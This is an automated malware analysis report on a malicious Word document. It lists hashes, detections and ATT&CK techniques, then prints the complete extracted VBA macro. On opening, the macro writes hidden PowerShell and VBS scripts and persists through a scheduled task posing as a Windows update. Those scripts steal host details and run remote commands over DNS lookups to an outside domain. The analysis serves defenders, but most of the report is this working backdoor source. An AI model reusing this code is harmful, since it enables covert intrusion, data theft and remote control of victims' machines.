Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 a87c1a87d90f7426…

MALICIOUS

Office (OOXML)

28.3 KB Created: 2018-06-06 15:25:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2018-07-14
MD5: 03ae637d69b14eeb3b390bf57d870292 SHA-1: ab9bbe26f21b688c07fc776a4871da8d9a5e5c30 SHA-256: a87c1a87d90f742614c61cf4fb15fdc400d2212fd14e96cd55bb9c1a0f09220f
458 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a VBA macro that automatically executes upon opening the document. This macro leverages WScript.Shell and cmd.exe to construct and execute a PowerShell script. The script appears to be designed to download and execute a second-stage payload, indicated by the creation of temporary files and the use of PowerShell commands. The presence of the Document_Open macro and the execution of PowerShell strongly suggest a malicious downloader.

Heuristics 11

  • ClamAV: Doc.Downloader.Generic-6698329-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698329-0
  • VBA project inside OOXML medium 8 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    command = "schtasks /create /sc minute /mo 5 /tn WindowsUpdateTolkit /tr " + Tempory
Call Shell(command, 0)
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    sss = sss + "Set o = CreateObject(@Wscript.Network@) " + vbCrLf
sss = sss + "Set wshShell = CreateObject(@WScript.Shell@) " + vbCrLf
sss = sss + "Arch = wshShell.ExpandEnvironmentStrings(@%PROCESSOR_ARCHITECTURE%@) " + vbCrLf
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
    sss = sss + "windir = Environ(@windir@) " + vbCrLf
sss = sss + "    Com = windir + @\syswow64\windowspowershell\v1.0\powershell.exe@ " + vbCrLf
sss = sss + "Else " + vbCrLf
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Dim sss As String
sss = sss + "Set o = CreateObject(@Wscript.Network@) " + vbCrLf
sss = sss + "Set wshShell = CreateObject(@WScript.Shell@) " + vbCrLf
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
    Matched line in script
    s = s + "$domain= $ran1 + $he + '.firewallsupports.com'" + vbCrLf
s = s + "$get=cmd /c ping -n 1 $domain  " + vbCrLf
s = s + "$regex = [regex] '\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b'" + vbCrLf
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
Private Sub Document_Open()
UserName = Environ("USERPROFILE")
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    Private Sub Document_Open()
UserName = Environ("USERPROFILE")
Tempory = UserName + "\AppData\Local\Temp\TempSystemRecovery.vbs"
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 9837 bytes
SHA-256: 803ce39c2242dd0b3418c85e567cb3999a03cd7ab98e7edbb06cb09ac46a2e4f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
UserName = Environ("USERPROFILE")
Tempory = UserName + "\AppData\Local\Temp\TempSystemRecovery.vbs"
Tempory0 = UserName + "\AppData\Local\Temp\SystemRecoverytolkit.ps1"
Tempory1 = UserName + "\AppData\Local\Temp\SystemRecovery.ps1"
Dim s As String
s = "function ran (){$chars = [char[]]'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'" + vbCrLf
s = s + "return [string](($chars[0..25]|Get-Random)+(($chars|Get-Random -Count 4) -join ''))}function hex($s){$r=''" + vbCrLf
s = s + " for ($i = 0; $i -lt $s.length; $i++){ " + vbCrLf
s = s + "    $ac=[int][char]$s[$i]" + vbCrLf
s = s + "    $r+= [Convert]::ToString($ac, 16)  } return $r}  function GetStarted(){if(Test-Path 'HKCU:\Software\Microsoft\Cashe'){$ran=(Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Cashe').index }elseif(Test-Path '$env:Userprofile\AppData\Local\Temp\UserProfileInfo'){$ran = Get-Content $env:Userprofile'\AppData\Local\Temp\UserProfileInfo'}else{$ran=Get-Random -Minimum 1000 -Maximum 9999" + vbCrLf
s = s + "    $ran ='d'+ $ran" + vbCrLf
s = s + "    New-Item -Path 'HKCU:\Software\Microsoft\Cashe' -ErrorAction SilentlyContinue" + vbCrLf
s = s + "    Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Cashe' -Name 'index' -Value $ran -ErrorAction SilentlyContinue" + vbCrLf
s = s + "    Set-Content -Path $env:Userprofile'\AppData\Local\Temp\UserProfileInfo' -Value $ran -ErrorAction SilentlyContinue}" + vbCrLf
s = s + "    $idm = 'd' + $ran" + vbCrLf
s = s + "$he = hex $idm" + vbCrLf
s = s + "$ran1=ran" + vbCrLf
s = s + "$domain= $ran1 + $he + '.firewallsupports.com'" + vbCrLf
s = s + "$get=cmd /c ping -n 1 $domain  " + vbCrLf
s = s + "$regex = [regex] '\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b'" + vbCrLf
s = s + "$tt=$regex.Matches($get) | %{ $_.value } " + vbCrLf
s = s + "$rt=$tt[0]" + vbCrLf
s = s + "if ($rt.split('.')[0] -eq '200'){$au=$env:username + '$'" + vbCrLf
s = s + "$au+=$env:computername + '$'" + vbCrLf
s = s + "$au+=(Get-WmiObject win32_computersystem).Domain + '$'" + vbCrLf
s = s + "$au+=(Get-WmiObject win32_computersystem).Model + '$'" + vbCrLf
s = s + "$sran=Get-Random -Minimum 30 -Maximum 60" + vbCrLf
s = s + "Start-Sleep -Seconds $sran" + vbCrLf
s = s + "$au= $au.replace(' ' , '%')" + vbCrLf
s = s + "send-dns $au 'a'}}" + vbCrLf
s = s + "function send-dns ([string]$au,[string]$in){ [int]$y = $au.length / 10" + vbCrLf
s = s + " $cu1=0 " + vbCrLf
s = s + " $cu2=0" + vbCrLf
s = s + " $lsm = New-Object System.Collections.ArrayList" + vbCrLf
s = s + " for ($i=0 ; $i -le $y ;$i++){ $cu1+=10" + vbCrLf
s = s + "    $pp='' " + vbCrLf
s = s + "    foreach($p in $au[$cu2..$cu1])   {      $pp+=$p     }   $cu2=$cu1 + 1" + vbCrLf
s = s + "   $lsm.Add($pp)   } $coun=100" + vbCrLf
s = s + " foreach ($t in $lsm) {$sran=Get-Random -Minimum 30 -Maximum 60" + vbCrLf
s = s + " Start-Sleep -Seconds $sran" + vbCrLf
s = s + "    $coun += 1" + vbCrLf
s = s + "    $data = hex $t" + vbCrLf
s = s + "    $idn = hex $ran" + vbCrLf
s = s + "    $he1 = hex $in" + vbCrLf
s = s + "    [string]$str = $coun" + vbCrLf
s = s + "    $seq = hex $str" + vbCrLf
s = s + "    $ran1 = ran" + vbCrLf
s = s + "    $domain= $ran1 + $he1 + $idn + $seq + $data + '.firewallsupports.com'" + vbCrLf
s = s + "  $get=cmd /c ping -n 1 $domain   } " + vbCrLf
s = s + "  $sran=Get-Random -Minimum 30 -Maximum 60" + vbCrLf
s = s + "Start-Sleep -Seconds $sran" + vbCrLf
s = s + "  $idm = 'f'+$ran" + vbCrLf
s = s + "  $he1 = hex $idm " + vbCrLf
s = s + "  $ran1=ran" + vbCrLf
s = s + "  $domain= $ran1 + $he1 + '.firewallsupports.com'" + vbCrLf
s = s + "$get=cmd /c ping -n 1 $domain   }GetStarted " + vbCrLf
Dim ss As String
ss = ss + "function ran (){$chars = [char[]]'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'" + vbCrLf
ss = ss + "return [string](($chars[0..25]|Get-Random)+(($chars|Get-Random -Count 4) -join ''))}function hex($s){$r=''" + vbCrLf
ss = ss + "for ($i = 0; $i -lt $s.length; $i++){    $ac=[int][char]$s[$i]" + vbCrLf
ss = ss + "$r+= [Convert]::ToString($ac, 16)  } return $r}function ttttt($data,$in,$coun){if(Test-Path 'HKCU:\Software\Microsoft\Cashe'){   $id=(Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Cashe').index      }elseif(Test-Path '$env:Userprofile\AppData\Local\Temp\UserProfileInfo')    {$id = get-Content $env:Userprofile'\AppData\Local\Temp\UserProfileInfo' }$sran=Get-Random -Minimum 30 -Maximum 60" + vbCrLf
ss = ss + "Start-Sleep -Seconds $sran" + vbCrLf
ss = ss + "$rnd = ran" + vbCrLf
ss = ss + "$id = hex $id" + vbCrLf
ss = ss + "$domain = $rnd + $in + $id + $coun + $data + '.firewallsupports.com'" + vbCrLf
ss = ss + "$get=cmd /c ping -n 1 $domain  " + vbCrLf
ss = ss + "$regex = [regex] '\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b'" + vbCrLf
ss = ss + "$tt=$regex.Matches($get) | %{ $_.value } " + vbCrLf
ss = ss + "$rt=$tt[0]" + vbCrLf
ss = ss + "return $rt    }   function send-dns ([string]$au,[string]$in){[int]$y = $au.length / 10" + vbCrLf
ss = ss + "$cu1=0 " + vbCrLf
ss = ss + "$cu2=0" + vbCrLf
ss = ss + "$lsm = New-Object System.Collections.ArrayList" + vbCrLf
ss = ss + "for ($i=0 ; $i -le $y ;$i++){ $cu1+=10" + vbCrLf
ss = ss + "$pp='' " + vbCrLf
ss = ss + "foreach($p in $au[$cu2..$cu1]){$pp+=$p}$cu2=$cu1 + 1" + vbCrLf
ss = ss + "$lsm.Add($pp)      }$coun=100" + vbCrLf
ss = ss + "foreach ($t in $lsm) { $coun += 1" + vbCrLf
ss = ss + "$tt = hex $t" + vbCrLf
ss = ss + "$inin = hex $in" + vbCrLf
ss = ss + "[string]$con = $coun " + vbCrLf
ss = ss + "$co = hex $con" + vbCrLf
ss = ss + "ttttt $tt $inin $co}$f=hex 'f'" + vbCrLf
ss = ss + "ttttt '' $f '' }function start-dns() {$q = hex 'q'" + vbCrLf
ss = ss + "$t9 =  ttttt '' $q ''" + vbCrLf
ss = ss + "if ($t9.split('.')[0] -eq '200'){$packet=''" + vbCrLf
ss = ss + "$count=0" + vbCrLf
ss = ss + "for ($i=1 ;$i -le $t9.split('.')[1] ; $i++){[string]$se = $i + 99" + vbCrLf
ss = ss + "$h = hex 'h'" + vbCrLf
ss = ss + "$sese = hex $se" + vbCrLf
ss = ss + "$t91 =  ttttt '' $h $sese" + vbCrLf
ss = ss + "if($t91 -eq ''){$t91 =  ttttt '' $h $sese" + vbCrLf
ss = ss + "if($t91 -eq ''){$t91 =  ttttt '' $h $sese" + vbCrLf
ss = ss + "if($t91 -eq ''){$t91 =  ttttt '' $h $sese}}} $packet +=  $t91 + '.'" + vbCrLf
ss = ss + "$count+= 1}}" + vbCrLf
ss = ss + "if ($count -eq $t9.split('.')[1]){[string]$oo=''" + vbCrLf
ss = ss + "foreach($qq in $packet.split('.')){if ($qq.length -ne 0){if ($qq -eq '0'){   [string]$oo +=' ' }else{  [string]$oo += [char][int]$qq  }}}   $oo = $oo -replace '%' , ' '" + vbCrLf
ss = ss + "[string]$u=CMD /C $oo '2>&1'" + vbCrLf
ss = ss + "$u=$u -replace ' ' , '%'" + vbCrLf
ss = ss + "if ($u.length -le 10){$r = hex 'r'" + vbCrLf
ss = ss + "$uu =hex $u" + vbCrLf
ss = ss + "$nu = hex '101'" + vbCrLf
ss = ss + "$t92 =  ttttt $uu $r $nu" + vbCrLf
ss = ss + "if ($t92.split('.')[0] -eq '200'){$f = hex 'f'" + vbCrLf
ss = ss + "ttttt '' $f ''}}else{send-dns $u 'r'}}}start-dns" + vbCrLf

Dim sss As String
sss = sss + "Set o = CreateObject(@Wscript.Network@) " + vbCrLf
sss = sss + "Set wshShell = CreateObject(@WScript.Shell@) " + vbCrLf
sss = sss + "Arch = wshShell.ExpandEnvironmentStrings(@%PROCESSOR_ARCHITECTURE%@) " + vbCrLf
sss = sss + "If Arch = @AMD64@ Then " + vbCrLf
sss = sss + "set Environ = wshShell.Environment(@Process@) " + vbCrLf
sss = sss + "windir = Environ(@windir@) " + vbCrLf
sss = sss + "    Com = windir + @\syswow64\windowspowershell\v1.0\powershell.exe@ " + vbCrLf
sss = sss + "Else " + vbCrLf
sss = sss + "    Com = @powershell.exe@ " + vbCrLf
sss = sss + "End If " + vbCrLf
sss = sss + "Set o = CreateObject(@Wscript.Network@) " + vbCrLf
sss = sss + "Set wshell = CreateObject(@WScript.Shell@) " + vbCrLf
sss = sss + "s = wshell.ExpandEnvironmentStrings(@%SYSTEMDRIVE%@) " + vbCrLf
sss = sss + "d=s&@\Users\@&o.UserName & @\AppData\Local\Temp\SystemRecovery.ps1@ " + vbCrLf
sss = sss + "dd=s&@\Users\@&o.UserName & @\AppData\Local\Temp\SystemRecoverytolkit.ps1@ " + vbCrLf
sss = sss + "command = Com + @ -WindowStyle hidden -ExecutionPolicy bypass -file @ + d " + vbCrLf
sss = sss + "set shell=createobject(@wscript.shell@) " + vbCrLf
sss = sss + "shell.run command,0 " + vbCrLf
sss = sss + "command1 = Com + @ -WindowStyle hidden -ExecutionPolicy bypass -file @ + dd " + vbCrLf
sss = sss + "set shell1=createobject(@wscript.shell@) " + vbCrLf
sss = sss + "shell1.run command1,0 " + vbCrLf

Dim fso As Object
Set fso = CreateObject("Scripting.FileSystemObject")
Dim oFile As Object
Set oFile = fso.CreateTextFile(Tempory1, True)
oFile.WriteLine s
oFile.Close

Dim fso1 As Object
Set fso1 = CreateObject("Scripting.FileSystemObject")
Dim oFile1 As Object
Set oFile1 = fso1.CreateTextFile(Tempory0, True)
oFile1.WriteLine ss
oFile1.Close
Dim ssss As String
ssss = Replace(sss, "@", """")
Dim fso2 As Object
Set fso2 = CreateObject("Scripting.FileSystemObject")
Dim oFile2 As Object
Set oFile2 = fso2.CreateTextFile(Tempory, True)
oFile2.WriteLine ssss
oFile2.Close

Dim d As String
Dim com As String
Dim str As String
Dim exec As String
Arch = Environ("PROCESSOR_ARCHITECTURE")
windir = Environ("windir")
If Arch = "AMD64" Then
    com = windir + "\syswow64\windowspowershell\v1.0\powershell.exe"
Else
    com = "powershell.exe"
End If

Dim command As String
command = "schtasks /create /sc minute /mo 5 /tn WindowsUpdateTolkit /tr " + Tempory
Call Shell(command, 0)

End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 24064 bytes
SHA-256: 3acd783dff01faf7b2b92996b99507906944aae2c2b33c98f083ddc328a064f0
Detection
ClamAV: Doc.Downloader.Generic-6698329-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.